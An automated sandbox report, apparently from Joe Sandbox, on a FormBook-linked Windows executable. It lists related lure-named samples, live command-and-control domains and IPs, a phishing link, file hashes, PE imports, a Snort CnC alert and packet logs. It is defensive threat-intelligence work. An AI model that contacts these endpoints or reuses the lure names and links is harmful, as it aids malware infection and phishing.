                                              • Found application associated with file extension: .exe
                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                              Warnings

                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • VT rate limit hit for: GJRX21GBj3.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              10:39:49API Interceptor6948719x Sleep call for process: findstr.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              43.155.26.241Shipping documents.bat.exeGet hashmaliciousFormBookBrowse
                                              • www.cwgehkk.store/9fu0/
                                              shipping_doc.bat.exeGet hashmaliciousFormBookBrowse
                                              • www.cwgehkk.store/9fu0/
                                              SHIPPING_DOCUMENTS.exeGet hashmaliciousFormBookBrowse
                                              • www.cwgehkk.store/9fu0/
                                              SHIPPING_DOCS.bat.exeGet hashmaliciousFormBookBrowse
                                              • www.cwgehkk.store/9fu0/
                                              Maersk_Quotation034865374.exeGet hashmaliciousFormBookBrowse
                                              • www.cwgehkk.store/9fu0/
                                              203.161.55.102Request for Quotation for PTTEP - EPCC for SISGES Development Project 2.exeGet hashmaliciousFormBookBrowse
                                              • www.lexiecos.top/ff8d/
                                              Materials specification with quantities.exeGet hashmaliciousFormBookBrowse
                                              • www.lexiecos.top/ff8d/
                                              Request for Quotation - (SM Store San Mateo).exeGet hashmaliciousFormBookBrowse
                                              • www.lexiecos.top/ff8d/
                                              PTT request form.exeGet hashmaliciousFormBookBrowse
                                              • www.bodfun.online/wbp0/
                                              Request for Quotation - e092876.exeGet hashmaliciousFormBookBrowse
                                              • www.lexiecos.top/ff8d/
                                              PTT requested quotation.exeGet hashmaliciousFormBookBrowse
                                              • www.bodfun.online/wbp0/
                                              RFQ - 5002172340000.exeGet hashmaliciousFormBookBrowse
                                              • www.lexiecos.top/ff8d/
                                              PO Number 00127011.exeGet hashmaliciousFormBookBrowse
                                              • www.timelesszone.xyz/bf2r/
                                              Quotation - TB046J12LCO2 Project Mechanical.exeGet hashmaliciousFormBookBrowse
                                              • www.lexiecos.top/ff8d/
                                              Shipping documents.bat.exeGet hashmaliciousFormBookBrowse
                                              • www.tenblog.life/0n9h/
                                              108.179.193.98Shipping documents.bat.exeGet hashmaliciousFormBookBrowse
                                              • www.siteblogoficialon.com/s9ii/
                                              shipping_doc.bat.exeGet hashmaliciousFormBookBrowse
                                              • www.siteblogoficialon.com/s9ii/
                                              SHIPPING_DOCUMENTS.exeGet hashmaliciousFormBookBrowse
                                              • www.siteblogoficialon.com/s9ii/
                                              SHIPPING_DOCS.bat.exeGet hashmaliciousFormBookBrowse
                                              • www.siteblogoficialon.com/s9ii/
                                              Maersk_Quotation034865374.exeGet hashmaliciousFormBookBrowse
                                              • www.siteblogoficialon.com/s9ii/

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              www.cwgehkk.storeShipping documents.bat.exeGet hashmaliciousFormBookBrowse
                                              • 43.155.26.241
                                              shipping_doc.bat.exeGet hashmaliciousFormBookBrowse
                                              • 43.155.26.241
                                              SHIPPING_DOCUMENTS.exeGet hashmaliciousFormBookBrowse
                                              • 43.155.26.241
                                              SHIPPING_DOCS.bat.exeGet hashmaliciousFormBookBrowse
                                              • 43.155.26.241
                                              Maersk_Quotation034865374.exeGet hashmaliciousFormBookBrowse
                                              • 43.155.26.241
                                              www.lavillitadepapa.comHSBCscancopy-invoice778483-payment87476MT103.exeGet hashmaliciousFormBookBrowse
                                              • 74.208.46.171
                                              www.kosherphonestore.com.cdn.hstgr.netnJ8mJTmMf0.exeGet hashmaliciousFormBookBrowse
                                              • 84.32.84.112
                                              DHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                              • 154.62.106.34
                                              Shipping Documents.pdf.exeGet hashmaliciousFormBookBrowse
                                              • 77.37.53.194
                                              Salary Raise.exeGet hashmaliciousFormBookBrowse
                                              • 84.32.84.40
                                              Salary List.exeGet hashmaliciousFormBookBrowse
                                              • 154.41.249.175
                                              shops.myshopify.com8bwKawHg0Z.exeGet hashmaliciousFormBookBrowse
                                              • 23.227.38.74
                                              aAEsSBx24sxHhRz.exeGet hashmaliciousFormBookBrowse
                                              • 23.227.38.74
                                              2024 Lusail Fence-WITH STICKER-2-003.exeGet hashmaliciousFormBookBrowse
                                              • 23.227.38.74
                                              Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                              • 23.227.38.74
                                              Document TOP19928.exeGet hashmaliciousFormBookBrowse
                                              • 23.227.38.74
                                              eiqj38BeRo.rtfGet hashmaliciousFormBookBrowse
                                              • 23.227.38.74
                                              Order-1351125X.docx.docGet hashmaliciousFormBookBrowse
                                              • 23.227.38.74
                                              http://outselluar.liveGet hashmaliciousUnknownBrowse
                                              • 23.227.38.74
                                              DHL ARRIVAL DOCUMENTS.pdf.exeGet hashmaliciousFormBookBrowse
                                              • 23.227.38.74
                                              98790ytt.exeGet hashmaliciousFormBookBrowse
                                              • 23.227.38.74

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              LILLY-ASUSd8gZVaN0ms.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, VidarBrowse
                                              • 43.153.49.49
                                              RR1h1iO6W2.exeGet hashmaliciousFormBookBrowse
                                              • 43.132.189.227
                                              watchdog.elfGet hashmaliciousMiraiBrowse
                                              • 40.4.14.73
                                              pKqvOdh3Sv.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 43.220.27.106
                                              94.156.79.133-mips-2024-07-01T19_26_38.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 40.41.25.80
                                              mirai.mips.elfGet hashmaliciousMiraiBrowse
                                              • 43.111.122.206
                                              setup.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, SmokeLoader, StealcBrowse
                                              • 43.153.49.49
                                              https://www.exactcollisionllc.com/Get hashmaliciousUnknownBrowse
                                              • 43.175.135.229
                                              16bfcGvz5N.elfGet hashmaliciousUnknownBrowse
                                              • 40.165.120.84
                                              o85sjrF5oi.elfGet hashmaliciousUnknownBrowse
                                              • 42.173.108.47
                                              VNPT-AS-VNVNPTCorpVNMUdeeReQ5R.exeGet hashmaliciousFormBookBrowse
                                              • 203.161.43.228
                                              7RsDGpyOQk.exeGet hashmaliciousFormBookBrowse
                                              • 203.161.41.205
                                              RR1h1iO6W2.exeGet hashmaliciousFormBookBrowse
                                              • 203.161.49.220
                                              SOA 020724.exeGet hashmaliciousFormBookBrowse
                                              • 203.161.49.220
                                              RW-TS-Payment204_A3084_04893_D4084_Y5902_CE3018_S4081_W30981.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                              • 203.161.46.44
                                              Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeGet hashmaliciousFormBookBrowse
                                              • 203.161.49.220
                                              Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exeGet hashmaliciousFormBookBrowse
                                              • 203.161.49.220
                                              file.exeGet hashmaliciousFormBookBrowse
                                              • 203.161.43.228
                                              Inquiry No PJO-4010574.exeGet hashmaliciousFormBookBrowse
                                              • 203.161.49.220
                                              je7RnKrgQO.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                              • 203.161.46.44
                                              UNIFIEDLAYER-AS-1USMUdeeReQ5R.exeGet hashmaliciousFormBookBrowse
                                              • 162.240.81.18
                                              kZa81nzREg.exeGet hashmaliciousAgentTeslaBrowse
                                              • 162.241.62.63
                                              https://link.mail.beehiiv.com/ls/click?upn=u001.I67xw9O-2FCIng4d3bGWl4wF1gb7u7ov5hHZyE-2Bbx9UTzw17nXfIKdJcwxuwzDNoy2zqPLSJo-2BNEQCUif7aqDwom-2FNyeTx4oiB0wLXwXnzsK4D0yrlxIKEkPM7Cj-2FHMmK1N5sLNWwmlbyGbHeuv6ehAEECnEs6fFQOqqwD-2FKToPwl8ZCnBHVdQ3QU8RWhloPcfXcxa_hzdxOAnI3B-2BYhj5tgQXSRCdoGEcuM88dXETG-2BahO6Uvd8cr2jZPTzAVk72oAubAHPgVJjhCdU6bjbXnflniNIkDzPhLxyvQL1dSWfR-2BUbH1DS3LUwJipSkZoP8d1ryYR0TIdt5CyNutkaFy6gLHYcR4kl-2Fz1ezOldYW2WX0ghZl4CCdgYPK2Cj3fM7MmBqLOIY-2B5u5WgDkBzfdFRbwHzvpAejc0JJJ7tYmz-2BUzjH-2BoYmk-2F0HGjFVUaYNWyGnhGX4EhZzw6qOcJEaxZhVjnDpWPL3U5gs5ZetaaeYkMX5whQyh7U-2B0b4Qj0LqFla1tJlWVR4EZMTu40FIJ9BSbWnjEcc9JxuCrqAu48-2BpVmjPzA43qg6bd2x0AWoed1RbQeWVzBT648qZJ7L-2FqgKPY6ysg2U7IBuGeVI7oxhhKCbXSZln5jVQGdCxXpADLZSMla5T1Id6eeDoJeYo7zr6VqE6vw-3D-3D#aGFydG11dC5zY2htaWR0QGtwcy1jb25zdWx0aW5nLmNvbQ==Get hashmaliciousUnknownBrowse
                                              • 69.49.230.170
                                              7RsDGpyOQk.exeGet hashmaliciousFormBookBrowse
                                              • 162.240.81.18
                                              TRANEXAMIC ACID & CAMPHANEDIOL SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
                                              • 192.254.225.136
                                              awb_shipping_post_02072024224782020031808174CN18020724000000224(991KB).vbsGet hashmaliciousGuLoaderBrowse
                                              • 192.185.217.247
                                              _Account Receipt.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                              • 192.185.143.105
                                              PO-2024)bekotas.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                              • 108.167.140.123
                                              https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuITGet hashmaliciousHTMLPhisherBrowse
                                              • 162.241.62.33
                                              DHL_AWB 98776013276.xlsGet hashmaliciousFormBookBrowse
                                              • 192.185.89.92

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\H0840I45

                                              Download File
                                              Process:C:\Windows\SysWOW64\findstr.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                              Category:dropped
                                              Size (bytes):196608
                                              Entropy (8bit):1.121297215059106
                                              Encrypted:false
                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              Static File Info

                                              General

                                              File type:PE32+ executable (console) x86-64, for MS Windows
                                              Entropy (8bit):7.04251611082169
                                              TrID:
                                              • Win64 Executable Console Net Framework (206006/5) 48.58%
                                              • Win64 Executable Console (202006/5) 47.64%
                                              • Win64 Executable (generic) (12005/4) 2.83%
                                              • Generic Win/DOS Executable (2004/3) 0.47%
                                              • DOS Executable Generic (2002/1) 0.47%
                                              File name:GJRX21GBj3.exe
                                              File size:1'951'744 bytes
                                              MD5:804cc1b2769f38027fd2c2bf8141013b
                                              SHA1:b75af1f4f65b7f12ba311c3c14c67642c0898fb8
                                              SHA256:04ca4f891cf5c2c412c58340ec0de521f940f4b36c1b0b7f1aa1fdae080922aa
                                              SHA512:23bac15afc3528c7f23128d50c2e817ebec00c32e28f28bd54d1194d422cdfd2f936ae840224c0f096c741d135253a265406394b8e2847ae29a0cfed4a045e38
                                              SSDEEP:49152:/OD+bTI6YTDml4HJPHDQkOBU0f9iygcrxZ3aU5ZeIrRo2ht171fvkTQmtPI5:ev85oQmtg
                                              TLSH:B695BE15E3E801A8E577EB34CA629333CAB1B8661730E58F065CD2451F73EA19B7B316
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.x...+...+...+^..*...+^..*...+^..*...+.b.+...+.b.*...+...+o..+n..*...+n..*...+...+...+n..*...+...*...+...*...+Rich...+.......

                                              File Icon

                                              Icon Hash:00928e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x140060b78
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x140000000
                                              Subsystem:windows cui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x667A0914 [Tue Jun 25 00:02:28 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:6
                                              OS Version Minor:0
                                              File Version Major:6
                                              File Version Minor:0
                                              Subsystem Version Major:6
                                              Subsystem Version Minor:0
                                              Import Hash:8f2ed59ffaf0389477f5411c8b4c37fd

                                              Entrypoint Preview

                                              Instruction
                                              dec eax
                                              sub esp, 28h
                                              call 00007FB4C082D2C4h
                                              dec eax
                                              add esp, 28h
                                              jmp 00007FB4C082CB17h
                                              int3
                                              int3
                                              jmp 00007FB4C082D650h
                                              int3
                                              int3
                                              int3
                                              dec eax
                                              sub esp, 28h
                                              dec ebp
                                              mov eax, dword ptr [ecx+38h]
                                              dec eax
                                              mov ecx, edx
                                              dec ecx
                                              mov edx, ecx
                                              call 00007FB4C082CCB2h
                                              mov eax, 00000001h
                                              dec eax
                                              add esp, 28h
                                              ret
                                              int3
                                              int3
                                              int3
                                              inc eax
                                              push ebx
                                              inc ebp
                                              mov ebx, dword ptr [eax]
                                              dec eax
                                              mov ebx, edx
                                              inc ecx
                                              and ebx, FFFFFFF8h
                                              dec esp
                                              mov ecx, ecx
                                              inc ecx
                                              test byte ptr [eax], 00000004h
                                              dec esp
                                              mov edx, ecx
                                              je 00007FB4C082CCB5h
                                              inc ecx
                                              mov eax, dword ptr [eax+08h]
                                              dec ebp
                                              arpl word ptr [eax+04h], dx
                                              neg eax
                                              dec esp
                                              add edx, ecx
                                              dec eax
                                              arpl ax, cx
                                              dec esp
                                              and edx, ecx
                                              dec ecx
                                              arpl bx, ax
                                              dec edx
                                              mov edx, dword ptr [eax+edx]
                                              dec eax
                                              mov eax, dword ptr [ebx+10h]
                                              mov ecx, dword ptr [eax+08h]
                                              dec eax
                                              mov eax, dword ptr [ebx+08h]
                                              test byte ptr [ecx+eax+03h], 0000000Fh
                                              je 00007FB4C082CCADh
                                              movzx eax, byte ptr [ecx+eax+03h]
                                              and eax, FFFFFFF0h
                                              dec esp
                                              add ecx, eax
                                              dec esp
                                              xor ecx, edx
                                              dec ecx
                                              mov ecx, ecx
                                              pop ebx
                                              jmp 00007FB4C082CCB6h
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              nop word ptr [eax+eax+00000000h]
                                              dec eax
                                              cmp ecx, dword ptr [00169919h]
                                              jne 00007FB4C082CCB2h
                                              dec eax
                                              rol ecx, 10h
                                              test cx, FFFFh
                                              jne 00007FB4C082CCA3h
                                              ret
                                              dec eax
                                              ror ecx, 10h
                                              jmp 00007FB4C082CF37h
                                              int3

                                              Rich Headers

                                              Programming Language:
                                              • [IMP] VS2008 SP1 build 30729

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x1c6da00x58.rdata
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1c6df80xf0.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1e80000x42ef4.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d70000x107dc.pdata
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x22b0000x570.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x1a4fb00x54.rdata
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x1a51800x28.rdata
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1a4e700x140.rdata
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x1590000x730.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x655d80x65600a83f1f68413cc5604ea156c8e93e3b1aFalse0.45910960619605423data6.657947877840493IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .managed0x670000xb1c880xb1e007b21ac36faefbbd8cf5ba1dba17ccad1False0.46262023453970486data6.453352722930797IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              hydrated0x1190000x3f1300x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rdata0x1590000x6f8240x6fa009aea8f55921091b9c8265e5f5a3d9885False0.4840972319428891zlib compressed data6.509656732765877IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x1c90000xd4880x1800f9836cce0b2cf07524bb2892ecd5dfcaFalse0.20686848958333334data2.944302619462605IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .pdata0x1d70000x107dc0x1080045a3194d8cdb409c1eb277bf8de8bbc5False0.4964044744318182data6.150240338049358IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .rsrc0x1e80000x42ef40x43000aaf38292e2378db6252c4a1898950311False0.9966439773787313data7.998308580921455IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x22b0000x5700x6005545a2e51f7a2893c697b39a79ed20edFalse0.5950520833333334data5.168122039701614IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              BINARY0x1e810c0x42884data1.0003339253475025
                                              RT_VERSION0x22a9900x378data0.35923423423423423
                                              RT_MANIFEST0x22ad080x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                              Imports

                                              DLLImport
                                              ADVAPI32.dllAdjustTokenPrivileges, CreateWellKnownSid, DeregisterEventSource, DuplicateTokenEx, GetSecurityDescriptorLength, GetTokenInformation, GetWindowsAccountDomainSid, LookupPrivilegeValueW, OpenProcessToken, OpenThreadToken, RegCloseKey, RegCreateKeyExW, RegDeleteKeyExW, RegDeleteTreeW, RegDeleteValueW, RegEnumKeyExW, RegEnumValueW, RegFlushKey, RegOpenKeyExW, RegQueryInfoKeyW, RegQueryValueExW, RegSetValueExA, RegSetValueExW, RegisterEventSourceW, ReportEventW, RevertToSelf, SetThreadToken
                                              bcrypt.dllBCryptOpenAlgorithmProvider, BCryptCloseAlgorithmProvider, BCryptDecrypt, BCryptDestroyKey, BCryptGenRandom
                                              KERNEL32.dllTlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, AllocConsole, CancelThreadpoolIo, CloseHandle, CloseThreadpoolIo, CopyFileExW, CreateDirectoryW, CreateEventExW, CreateFileW, CreateProcessA, CreateSymbolicLinkW, CreateThreadpoolIo, DeleteCriticalSection, DeleteFileW, DeleteVolumeMountPointW, DeviceIoControl, DuplicateHandle, EnterCriticalSection, ExitProcess, ExpandEnvironmentStringsW, FileTimeToSystemTime, FindClose, FindFirstFileExW, FindNextFileW, FormatMessageW, FreeConsole, FreeLibrary, GetCPInfo, GetConsoleOutputCP, GetConsoleWindow, GetCurrentProcess, GetCurrentProcessId, GetCurrentProcessorNumberEx, GetCurrentThread, GetDynamicTimeZoneInformation, GetEnvironmentVariableW, GetFileAttributesExW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFileType, GetFinalPathNameByHandleW, GetFullPathNameW, GetLastError, GetLogicalDrives, GetLongPathNameW, GetModuleFileNameW, GetModuleHandleA, GetOverlappedResult, GetProcAddress, GetStdHandle, GetSystemTime, GetThreadPriority, GetTickCount64, GetTimeZoneInformation, GetVolumeInformationW, InitializeConditionVariable, InitializeCriticalSection, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryExW, LocalAlloc, LocalFree, MoveFileExW, MultiByteToWideChar, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseFailFastException, ReadFile, RemoveDirectoryW, ReplaceFileW, ResetEvent, ResumeThread, SetEvent, SetFileAttributesW, SetFileInformationByHandle, SetLastError, SetThreadErrorMode, SetThreadPriority, Sleep, SleepConditionVariableCS, StartThreadpoolIo, SystemTimeToFileTime, TzSpecificLocalTimeToSystemTime, VirtualAlloc, VirtualFree, WaitForMultipleObjectsEx, WakeConditionVariable, WideCharToMultiByte, WriteFile, FlushProcessWriteBuffers, WaitForSingleObjectEx, RtlVirtualUnwind, RtlCaptureContext, RtlRestoreContext, VerSetConditionMask, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, SwitchToThread, CreateThread, GetCurrentThreadId, SuspendThread, GetThreadContext, SetThreadContext, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, VerifyVersionInfoW, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, VirtualQuery, GetSystemTimeAsFileTime, InitializeCriticalSectionEx, DebugBreak, WaitForSingleObject, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RaiseException, RtlPcToFileHeader, RtlUnwindEx, InitializeSListHead, IsProcessorFeaturePresent, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlLookupFunctionEntry
                                              ole32.dllCoWaitForMultipleHandles, CoGetApartmentType, CoCreateGuid, CoInitializeEx, CoUninitialize, CoTaskMemFree, CoTaskMemAlloc
                                              api-ms-win-crt-math-l1-1-0.dll__setusermatherr, modf, ceil
                                              api-ms-win-crt-heap-l1-1-0.dll_callnewh, free, _set_new_mode, calloc, malloc
                                              api-ms-win-crt-string-l1-1-0.dllstrcmp, wcsncmp, _stricmp, strcpy_s
                                              api-ms-win-crt-convert-l1-1-0.dllstrtoull
                                              api-ms-win-crt-runtime-l1-1-0.dllabort, _c_exit, terminate, _crt_atexit, _register_onexit_function, _initialize_onexit_table, _seh_filter_exe, _set_app_type, _configure_wide_argv, _initialize_wide_environment, _get_initial_wide_environment, _register_thread_local_exe_atexit_callback, _initterm_e, exit, _exit, _initterm, __p___argc, __p___wargv, _cexit
                                              api-ms-win-crt-stdio-l1-1-0.dll_set_fmode, __p__commode
                                              api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

                                              Exports

                                              NameOrdinalAddress
                                              DotNetRuntimeDebugHeader10x1401c9b90

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              07/03/24-16:39:32.243675TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971180192.168.2.523.227.38.74

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jul 3, 2024 16:39:32.235827923 CEST4971180192.168.2.523.227.38.74
                                              Jul 3, 2024 16:39:32.241051912 CEST804971123.227.38.74192.168.2.5
                                              Jul 3, 2024 16:39:32.241215944 CEST4971180192.168.2.523.227.38.74
                                              Jul 3, 2024 16:39:32.243674994 CEST4971180192.168.2.523.227.38.74
                                              Jul 3, 2024 16:39:32.248553991 CEST804971123.227.38.74192.168.2.5
                                              Jul 3, 2024 16:39:32.818770885 CEST804971123.227.38.74192.168.2.5
                                              Jul 3, 2024 16:39:32.818922043 CEST804971123.227.38.74192.168.2.5
                                              Jul 3, 2024 16:39:32.819103956 CEST804971123.227.38.74192.168.2.5
                                              Jul 3, 2024 16:39:32.819175005 CEST4971180192.168.2.523.227.38.74
                                              Jul 3, 2024 16:39:32.819246054 CEST4971180192.168.2.523.227.38.74
                                              Jul 3, 2024 16:39:32.822602034 CEST4971180192.168.2.523.227.38.74
                                              Jul 3, 2024 16:39:32.827436924 CEST804971123.227.38.74192.168.2.5
                                              Jul 3, 2024 16:39:55.999197006 CEST4971380192.168.2.584.32.84.130
                                              Jul 3, 2024 16:39:56.004858971 CEST804971384.32.84.130192.168.2.5
                                              Jul 3, 2024 16:39:56.004966021 CEST4971380192.168.2.584.32.84.130
                                              Jul 3, 2024 16:39:56.006809950 CEST4971380192.168.2.584.32.84.130
                                              Jul 3, 2024 16:39:56.013406992 CEST804971384.32.84.130192.168.2.5
                                              Jul 3, 2024 16:39:56.471627951 CEST804971384.32.84.130192.168.2.5
                                              Jul 3, 2024 16:39:56.471968889 CEST804971384.32.84.130192.168.2.5
                                              Jul 3, 2024 16:39:56.472054005 CEST4971380192.168.2.584.32.84.130
                                              Jul 3, 2024 16:39:57.517075062 CEST4971380192.168.2.584.32.84.130
                                              Jul 3, 2024 16:39:58.535341978 CEST4971480192.168.2.584.32.84.130
                                              Jul 3, 2024 16:39:58.540425062 CEST804971484.32.84.130192.168.2.5
                                              Jul 3, 2024 16:39:58.540539980 CEST4971480192.168.2.584.32.84.130
                                              Jul 3, 2024 16:39:58.542188883 CEST4971480192.168.2.584.32.84.130
                                              Jul 3, 2024 16:39:58.548754930 CEST804971484.32.84.130192.168.2.5
                                              Jul 3, 2024 16:39:59.017893076 CEST804971484.32.84.130192.168.2.5
                                              Jul 3, 2024 16:39:59.018307924 CEST804971484.32.84.130192.168.2.5
                                              Jul 3, 2024 16:39:59.018402100 CEST4971480192.168.2.584.32.84.130
                                              Jul 3, 2024 16:40:00.048515081 CEST4971480192.168.2.584.32.84.130
                                              Jul 3, 2024 16:40:01.066983938 CEST4971580192.168.2.584.32.84.130
                                              Jul 3, 2024 16:40:01.072287083 CEST804971584.32.84.130192.168.2.5
                                              Jul 3, 2024 16:40:01.072549105 CEST4971580192.168.2.584.32.84.130
                                              Jul 3, 2024 16:40:01.074760914 CEST4971580192.168.2.584.32.84.130
                                              Jul 3, 2024 16:40:01.080194950 CEST804971584.32.84.130192.168.2.5
                                              Jul 3, 2024 16:40:01.080888987 CEST804971584.32.84.130192.168.2.5
                                              Jul 3, 2024 16:40:01.555587053 CEST804971584.32.84.130192.168.2.5
                                              Jul 3, 2024 16:40:01.556094885 CEST804971584.32.84.130192.168.2.5
                                              Jul 3, 2024 16:40:01.556284904 CEST4971580192.168.2.584.32.84.130
                                              Jul 3, 2024 16:40:02.579649925 CEST4971580192.168.2.584.32.84.130
                                              Jul 3, 2024 16:40:03.608007908 CEST4971680192.168.2.584.32.84.130
                                              Jul 3, 2024 16:40:03.613008976 CEST804971684.32.84.130192.168.2.5
                                              Jul 3, 2024 16:40:03.613104105 CEST4971680192.168.2.584.32.84.130
                                              Jul 3, 2024 16:40:03.615106106 CEST4971680192.168.2.584.32.84.130
                                              Jul 3, 2024 16:40:03.620141983 CEST804971684.32.84.130192.168.2.5
                                              Jul 3, 2024 16:40:04.078109026 CEST804971684.32.84.130192.168.2.5
                                              Jul 3, 2024 16:40:04.078440905 CEST804971684.32.84.130192.168.2.5
                                              Jul 3, 2024 16:40:04.078633070 CEST804971684.32.84.130192.168.2.5
                                              Jul 3, 2024 16:40:04.078793049 CEST4971680192.168.2.584.32.84.130
                                              Jul 3, 2024 16:40:04.078793049 CEST4971680192.168.2.584.32.84.130
                                              Jul 3, 2024 16:40:04.081206083 CEST4971680192.168.2.584.32.84.130
                                              Jul 3, 2024 16:40:04.092896938 CEST804971684.32.84.130192.168.2.5
